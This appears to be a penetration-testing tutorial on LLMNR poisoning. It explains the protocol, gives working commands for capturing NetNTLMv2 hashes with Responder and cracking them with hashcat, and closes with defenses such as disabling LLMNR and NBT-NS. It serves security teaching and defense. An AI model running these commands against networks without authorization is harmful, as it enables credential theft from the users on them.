LLMNR Poisoning

What is LLMNR?

LLMNR (Link-Local Multicast Name Resolution) is a descentralized application protocol similar to DNS that allows to resolve hostnames in the same local network, which means that its packets are not forwarded by routers and are only transmited in their network segment.

It is included in Windows since Windows Vista, and is the third preferred method to resolve names. The order of preference is the following:

1. DNS

2. mDNS

3. LLMNR

4. NBNS

In a Windows network, the computers are listening into the port 5355/UDP and to resolve a name, the client sends a LLMNR query to the multicast address 224.0.0.252 in IPv4 (FF02:0:0:0:0:0:1:3 in IPv6). The queries follow the DNS format and can be use to ask not only for names, but also any other question supported by DNS.

What is LLMNR Poisoning?

The common case is use LLMNR to resolve names in local link by sending A DNS queries. In this case, the computer that has the queried name should response. But, of course, the query can be responded by anyone, even by an attacker to perform a MITM attack.

The key flaw is that the services utilize a user's username and NTLMv2 password hash when appropriately responded to.

An attack can use Responder to recollect NTLM hashes in networks with Windows machines:

LLMNR Poisoning

The very first step of an AD pentest is spawning a Responder listener.

Exploitation

Step 1: Run Responder

GitHub - lgandx/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.GitHub

Responder

Responder spawns a MITM listener:

responder -I tun0 -dw

Step 2: Wait for an Event

We have to wait for an user to enter a wrong address so that DNS error is triggered.

Step 3: Get Hashes

Once a DNS error is triggered, we will get a username-hash pair in Responder.

Step 4: Crack Hashes

Since Hashcat utilizes GPU instead of CPU (which John the Ripper uses), we crack the hashes on Windows host machine, not Kali virtual machine:

hashcat -m 5600 hashes.txt rockyou.txt -O -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule --hwmon-disable

Notes:

• Install CUDA SDK first

• The hash type is NetNTLMv2 -> 5600

• OneRuleToRuleThemAll: https://github.com/NotSoSecure/password_cracking_rules

Defense

• The best defense in this case is to disable LLMNR and NBT-NS.

  • To disable LLMNR, select "Turn Off Multicast Name Resolution" under "Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client" in the "Group Policy Editor".

  • To disable NBT-NS, navigate to "Network Connections -> Network Adapter Properties -> TCP/IPv4 Properties -> Advanced -> WINS" and select "Disable NetBIOS over TCP/IP".

• If a company must use or cannot disable LLMNR/NBT-NS, the best course of action is to:

  • Require Network Access Control

  • Require strong user password (e.g., > 14 characters in length and limit common word usage). The more complex and long the password, the harder it is for an attacker to crack the hash.